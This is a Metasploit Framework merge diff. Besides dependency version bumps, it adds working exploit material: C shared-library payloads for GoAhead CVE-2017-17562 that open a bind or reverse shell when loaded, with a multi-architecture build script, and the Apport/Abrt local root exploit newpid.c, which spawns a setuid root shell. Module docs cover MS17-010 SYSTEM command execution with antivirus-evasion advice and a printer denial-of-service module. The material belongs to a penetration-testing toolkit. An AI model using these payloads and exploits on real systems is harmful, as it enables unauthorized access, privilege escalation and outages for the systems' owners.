Merge pull request #9531 from pbarry-r7/4.x-pick-up-ROBOT

Cherry-pick from master for 4.x (pick up ROBOT).  Using green GH button because I effed up my cmdline...  :/

.ruby-version

@@ -1 +1 @@
-2.4.2
+2.4.3

.travis.yml

@@ -12,8 +12,8 @@ addons:
 language: ruby
 rvm:
   - '2.2'
-  - '2.3.5'
-  - '2.4.2'
+  - '2.3.6'
+  - '2.4.3'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'

Dockerfile

@@ -1,4 +1,4 @@
-FROM ruby:2.4.2-alpine
+FROM ruby:2.4.3-alpine3.7
 LABEL maintainer="Rapid7"
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -20,6 +20,8 @@ RUN apk update && \
       nmap-scripts \
       nmap-nselibs \
       postgresql-libs \
+      python \
+      python3 \
       ncurses \
       libcap \
     && apk add --virtual .ruby-builddeps \
@@ -27,7 +29,7 @@ RUN apk update && \
       bison \
       build-base \
       ruby-dev \
-      openssl-dev \
+      libressl-dev \
       readline-dev \
       sqlite-dev \
       postgresql-dev \

Gemfile

@@ -23,6 +23,14 @@ group :development do
     'x86-mingw32', 'x64-mingw32',
     'x86_64-linux', 'x86-linux',
     'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  gem 'google-protobuf', '3.5.1' if [
+    'x86-mingw32', 'x64-mingw32',
+    'x86_64-linux', 'x86-linux',
+    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
+  gem 'grpc', '1.8.3'  if [
+    'x86-mingw32', 'x64-mingw32',
+    'x86_64-linux', 'x86-linux',
+    'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
 end
 
 group :development, :test do

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.32)
+    metasploit-framework (4.16.38)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -18,9 +18,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.25)
+      metasploit-payloads (= 1.3.28)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.3.3)
+      metasploit_payloads-mettle (= 0.3.7)
       mqtt
       msgpack
       nessus_rest
@@ -73,7 +73,7 @@ PATH
 GEM
   remote: https://rubygems.org/
   specs:
-    Ascii85 (1.0.2)
+    Ascii85 (1.0.3)
     actionpack (4.2.10)
       actionview (= 4.2.10)
       activesupport (= 4.2.10)
@@ -103,12 +103,12 @@ GEM
       public_suffix (>= 2.0.2, < 4.0)
     afm (0.2.2)
     arel (6.0.4)
-    arel-helpers (2.5.0)
+    arel-helpers (2.6.1)
       activerecord (>= 3.1.0, < 6)
-    backports (3.11.0)
+    backports (3.11.1)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
-    bindata (2.4.1)
+    bindata (2.4.2)
     bit-struct (0.16)
     builder (3.2.3)
     coderay (1.1.2)
@@ -125,9 +125,9 @@ GEM
       railties (>= 3.0.0)
     faker (1.8.7)
       i18n (>= 0.7)
-    faraday (0.13.1)
+    faraday (0.14.0)
       multipart-post (>= 1.2, < 3)
-    ffi (1.9.18)
+    ffi (1.9.21)
     filesize (0.1.1)
     fivemat (1.3.5)
     google-protobuf (3.5.1)
@@ -146,7 +146,7 @@ GEM
       googleapis-common-protos-types (~> 1.0.0)
       googleauth (>= 0.5.1, < 0.7)
     hashery (2.1.2)
-    i18n (0.9.1)
+    i18n (0.9.3)
       concurrent-ruby (~> 1.0)
     jsobfu (0.4.2)
       rkelly-remix
@@ -181,21 +181,21 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.25)
-    metasploit_data_models (2.0.15)
+    metasploit-payloads (1.3.28)
+    metasploit_data_models (2.0.16)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
       metasploit-concern
       metasploit-model
-      pg
+      pg (= 0.20.0)
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.3.3)
+    metasploit_payloads-mettle (0.3.7)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
-    minitest (5.11.1)
+    minitest (5.11.3)
     mqtt (0.5.0)
     msgpack (1.2.2)
     multi_json (1.13.1)
@@ -203,8 +203,8 @@ GEM
     nessus_rest (0.1.6)
     net-ssh (4.2.0)
     network_interface (0.0.2)
-    nexpose (7.1.1)
-    nokogiri (1.8.1)
+    nexpose (7.2.0)
+    nokogiri (1.8.2)
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
@@ -323,7 +323,7 @@ GEM
       rspec-support (~> 3.7.0)
     rspec-rerun (1.1.0)
       rspec (~> 3.0)
-    rspec-support (3.7.0)
+    rspec-support (3.7.1)
     ruby-rc4 (0.1.5)
     ruby_smb (0.0.18)
       bindata
@@ -350,9 +350,9 @@ GEM
     thread_safe (0.3.6)
     timecop (0.9.1)
     ttfunk (1.5.1)
-    tzinfo (1.2.4)
+    tzinfo (1.2.5)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2017.3)
+    tzinfo-data (1.2018.3)
       tzinfo (>= 1.0.0)
     windows_error (0.1.2)
     xdr (2.0.0)
@@ -367,6 +367,8 @@ PLATFORMS
 DEPENDENCIES
   factory_girl_rails
   fivemat
+  google-protobuf (= 3.5.1)
+  grpc (= 1.8.3)
   metasploit-aggregator
   metasploit-framework!
   octokit

LICENSE

@@ -75,6 +75,10 @@ Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
 
+Files: lib/msf/core/modules/external/python/async_timeout/*
+Copyright: 2016-2017 Andrew Svetlov
+License: Apache 2.0
+
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

data/exploits/CVE-2017-17562/build.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,reverse,bind}
+   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so

data/exploits/CVE-2017-17562/goahead-cgi-bind.c

@@ -0,0 +1,96 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _bind_tcp_shell(void) {
+
+  int sfd, fd, i;
+  struct sockaddr_in addr,saddr;
+  unsigned int saddr_len = sizeof(struct sockaddr_in);
+
+  char *lport = "55555";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  sfd = socket(AF_INET, SOCK_STREAM, 0);
+  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
+
+  saddr.sin_family = AF_INET;
+  saddr.sin_port = htons(atoi(lport));
+  saddr.sin_addr.s_addr = INADDR_ANY;
+  bzero(&saddr.sin_zero, 8);
+
+  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
+    exit(1);
+  }
+
+  if (listen(sfd, 5) == -1) {
+    close(sfd);
+    exit(1);
+  }
+
+  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
+  close(sfd);
+
+  if (fd == -1) {
+    exit(1);
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _bind_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-reverse.c

@@ -0,0 +1,84 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _reverse_tcp_shell(void) {
+
+  int fd, i;
+  struct sockaddr_in addr;
+  char *lport = "55555";
+  char *lhost = "000.000.000.000";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  fd = socket(PF_INET, SOCK_STREAM, 0);
+  addr.sin_port = htons(atoi(lport));
+  addr.sin_addr.s_addr = inet_addr(lhost);
+  addr.sin_family = AF_INET;
+
+  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
+
+  for (i=0; i<10; i++) {
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _reverse_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+  void *mem;
+  void (*fn)();
+
+  unsetenv("LD_PRELOAD");
+
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork())
+    fn();
+
+  exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-system.c

@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    int dummy = 0;
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      dummy = system((const char*)payload);
+
+    exit(dummy);
+}

data/exploits/CVE-2017-17562/install-deps.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi

data/exploits/cve-2015-1318/newpid.c

@@ -0,0 +1,143 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <err.h>
+#include <syslog.h>
+#include <sched.h>
+#include <linux/sched.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+ 
+//
+// Apport/Abrt Vulnerability Demo Exploit.
+//
+//  Apport: CVE-2015-1318
+//  Abrt:   CVE-2015-1862
+// 
+//   -- taviso@cmpxchg8b.com, April 2015.
+//
+// $ gcc -static newpid.c
+// $ ./a.out
+// uid=0(root) gid=0(root) groups=0(root)
+// sh-4.3# exit
+// exit
+//
+// Hint: To get libc.a,
+//  yum install glibc-static or apt-get install libc6-dev
+//
+
+//
+// Modified for Metasploit. Original exploit:
+// - https://www.exploit-db.com/exploits/36746/
+//
+ 
+int main(int argc, char **argv)
+{
+    int status;
+    pid_t wrapper;
+    pid_t init;
+    pid_t subprocess;
+    unsigned i;
+
+    // If we're root, then we've convinced the core handler to run us,
+    // so create a setuid root executable that can be used outside the chroot.
+    if (getuid() == 0) {
+        if (chown("sh", 0, 0) != 0)
+            exit(EXIT_FAILURE);
+ 
+        if (chmod("sh", 04755) != 0)
+            exit(EXIT_FAILURE);
+ 
+        return EXIT_SUCCESS;
+    }
+ 
+    // If I'm not root, but euid is 0, then the exploit worked and we can spawn
+    // a shell and cleanup.
+    if (setuid(0) == 0) {
+        system("id");
+        system("rm -rf exploit");
+        execlp("sh", "sh", NULL);
+ 
+        // Something went wrong.
+        err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
+    }
+ 
+    // It looks like the exploit hasn't run yet, so create a chroot.
+    if (mkdir("exploit", 0755) != 0
+     || mkdir("exploit/usr", 0755) != 0
+     || mkdir("exploit/usr/share", 0755) != 0
+     || mkdir("exploit/usr/share/apport", 0755) != 0
+     || mkdir("exploit/usr/libexec", 0755) != 0) {
+        err(EXIT_FAILURE, "failed to create chroot directory");
+    }
+ 
+    // Create links to the exploit locations we need.
+    if (link(*argv, "exploit/sh") != 0
+     || link(*argv, "exploit/usr/share/apport/apport") != 0        // Ubuntu
+     || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) {  // Fedora
+        err(EXIT_FAILURE, "failed to create required hard links");
+    }
+ 
+    // Create a subprocess so we don't enter the new namespace.
+    if ((wrapper = fork()) == 0) {
+ 
+        // In the child process, create a new pid and user ns. The pid
+        // namespace is only needed on Ubuntu, because they check for %P != %p
+        // in their core handler. On Fedora, just a user ns is sufficient.
+        if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
+            err(EXIT_FAILURE, "failed to create new namespace");
+ 
+        // Create a process in the new namespace.
+        if ((init = fork()) == 0) {
+ 
+            // Init (pid 1) signal handling is special, so make a subprocess to
+            // handle the traps.
+            if ((subprocess = fork()) == 0) {
+                // Change /proc/self/root, which we can do as we're privileged
+                // within the new namepace.
+                if (chroot("exploit") != 0) {
+                    err(EXIT_FAILURE, "chroot didnt work");
+                }
+ 
+                // Now trap to get the core handler invoked.
+                __builtin_trap();
+ 
+                // Shouldn't happen, unless user is ptracing us or something.
+                err(EXIT_FAILURE, "coredump failed, were you ptracing?");
+            }
+ 
+            // If the subprocess exited with an abnormal signal, then everything worked.
+            if (waitpid(subprocess, &status, 0) == subprocess)    
+                return WIFSIGNALED(status)
+                        ? EXIT_SUCCESS
+                        : EXIT_FAILURE;
+ 
+            // Something didn't work.
+            return EXIT_FAILURE;
+        }
+ 
+        // The new namespace didn't work.
+        if (waitpid(init, &status, 0) == init)
+            return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
+                    ? EXIT_SUCCESS
+                    : EXIT_FAILURE;
+ 
+        // Waitpid failure.
+        return EXIT_FAILURE;
+    }
+ 
+    // If the subprocess returned sccess, the exploit probably worked,
+    // reload with euid zero.
+    if (waitpid(wrapper, &status, 0) == wrapper) {
+        // All done, spawn root shell.
+        if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
+            execl(*argv, "w00t", NULL);
+        }
+    }
+ 
+    // Unknown error.
+    errx(EXIT_FAILURE, "unexpected result, cannot continue");
+}

data/markdown_doc/default_template.erb

@@ -1,11 +1,9 @@
 ## <%= items[:mod_name] %>
-<p>
 <%= normalize_description(items[:mod_description]) %>
-</p>
 
 ## Module Name
 
-<%= Rex::Text.html_encode(items[:mod_fullname]) %>
+<%= CGI::escapeHTML(items[:mod_fullname]) %>
 
 ## Authors
 
@@ -47,4 +45,4 @@ No options required.
 
 ## Basic Usage
 
-<%= normalize_demo_output(items[:mod_demo]) %>
+<%= normalize_demo_output(items[:mod_demo]) %>

data/markdown_doc/html_template.erb

@@ -65,4 +65,4 @@
 </div>
 <% end %>
 </body>
-</html>
+</html>

documentation/modules/auxiliary/admin/smb/ms17_010_command.md

@@ -0,0 +1,86 @@
+## Introduction
+
+MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
+
+You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
+
+* CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
+* CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests
+
+This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
+
+## Vulnerable Server
+
+To be able to use auxiliary/admin/smb/ms17_010_command:
+
+1. You can OPTIONALLY use a valid username/password to bypass most of these requirements.
+2. The firewall must allow SMB traffic.
+3. The target must use SMBv1.
+4. The target must be missing the MS17-010 patch.
+5. The target must allow anonymous IPC$ and a Named Pipe.
+
+You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
+
+## Verification Steps
+
+At the minimum, you should be able use psexec to get a session with a valid credential using the following:
+
+```
+msf > use auxiliary/admin/smb/ms17_010_command
+msf exploit(psexec) > set RHOSTS 192.168.1.80
+RHOSTS => 192.168.1.80
+msf exploit(psexec) > exploit
+```
+
+## Options
+
+By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.
+
+**The NAMEDPIPE Option**
+
+By default, the module will scan for a list of common pipes for any available one. You can specify one by name.
+
+**The LEAKATTEMPTS Option**
+
+Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.
+
+**The DBGTRACE Option**
+
+Used to debug, gives extremely verbose information.
+
+**The SMBUser Option**
+
+This is a valid Windows username.
+
+**The SMBPass option**
+
+This can be either the plain text version or the Windows hash.
+
+## Scenarios
+
+**Automatic Target**
+
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+
+**Powershell Target**
+
+The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
+
+Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
+
+**Native Upload Target**
+
+The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the
+SHARE datastore option), and then execute it with psexec.
+
+This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
+
+**MOF Upload Target**
+
+The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
+format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
+
+Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting
+caught by antivirus on the target.
+
+The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.

documentation/modules/auxiliary/dos/http/brother_debut_dos.md

@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  Versions <= 1.20 of the Debut embedded httpd web server in use by Brother printers are vulnerable to denial of service 
+  via a crafted HTTP request. This module will render the printer unresponsive from requests for ~300 seconds.
+  This is thought to be caused by a single threaded web server which
+  has a ~300 second timeout value.  By sending a request with a content-length larger than the actual data, the server waits
+  to receive the rest of the data, which doesn't happen until the timeout occurs.  This DoS is for all services, not just http.
+
+  This module was successfully tested against a Brother HL-L2380DW series.
+
+  An nmap version scan of the vulnerable service should look similar to:
+  `80/tcp open  http    Debut embedded httpd 1.20 (Brother/HP printer http admin)`.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/dos/http/brother_debut_dos```
+  3. Do: ```set rhost [ip]```
+  4. Do: ```run```
+  5. You should see Success, and manual attempts to browse the web interface don't load.
+
+## Scenarios
+
+### Brother HL-L2380DW with Debut embedded 1.20
+
+```
+resource (brother.rc)> use auxiliary/dos/http/brother_debut_dos
+resource (brother.rc)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (brother.rc)> exploit
+[*] Sending malformed POST request at 2018-01-24 20:45:52.
+[+] 1.1.1.1:80 - Connection Refused: Success! Server will recover about 2018-01-24 20:50:52
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/gather/censys_search.md

@@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
 ## Verification Steps
 
 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
+2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
 4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK rapid7`
+5: Do: `set CENSYS_DORK query`
 6: Do: `run`
 
 ## Scenarios

documentation/modules/auxiliary/gather/shodan_honeyscore.md

@@ -1,8 +1,9 @@
-The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not. 
-When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/. 
+## Introduction
+The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
+When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
 
-#### NOTE: 
-In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
+#### NOTE:
+In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
 
 ## Verification Steps
 
@@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
   3. Do: `set TARGET <targetip>`
   4. Do: `set SHODAN_APIKEY <your apikey>`
   5. Do: `run`
-  6. If the API is up, you should recieve a score from 0.0 to 1.0.
+  6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
 
 ## Options
 
   **TARGET**
-  
+
   The remote host to request the API to scan.
-  
+
   **SHODAN_APIKEY**
 
-  This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
-  
+  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
+
 
 ## Scenarios
 

documentation/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.md

@@ -6,7 +6,7 @@ While the application is based in java, I was only able to get it to exploit aga
 
   [official site](http://cftp.coldcore.com/files/coloradoftp-prime-8.zip?site=cft1&rv=19.1&nc=1) or [github backup](https://github.com/h00die/MSF-Testing-Scripts/raw/master/coloradoftp-prime-8.zip)
   
-When installing, you must edit conf/beans.xml line 182 "localIp" to put in your IP or else `pasv` won't work.
+When installing, you must edit conf/beans.xml line 183 "remoteIp" to put in your IP or else `pasv` won't work.
 
 ## Verification Steps
 

documentation/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.md

@@ -0,0 +1,72 @@
+Some TLS implementations handle errors processing RSA key exchanges and encryption (PKCS #1 v1.5 messages) in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when the TLS server does not strictly check message formatting and needs less than a million requests on average to decode a given ciphertext. A weak oracle server strictly checks message formatting and often requires many more requests to perform the attack.
+
+## Vulnerable Applications
+
+* F5 BIG-IP 11.6.0-11.6.2 (fixed in 11.6.2 HF1), 12.0.0-12.1.2 HF1 (fixed in 12.1.2 HF2), or 13.0.0-13.0.0 HF2 (fixed in 13.0.0 HF3) (CVE 2017-6168)
+* Citrix NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 (CVE 2017-17382)
+* Radware Alteon firmware 31.0.0.0-31.0.3.0 (CVE 2017-17427)
+* Cisco ACE (CVE 2017-17428)
+* Cisco ASA 5500 series (CVE 2017-12373)
+* Bouncy Castle TLS < 1.0.3 configured to use the Java Cryptography Engine (CVE 2017-13098)
+* Erlang  < 20.1.7, < 19.3.6.4, < 18.3.4.7 (CVE 2017-1000385)
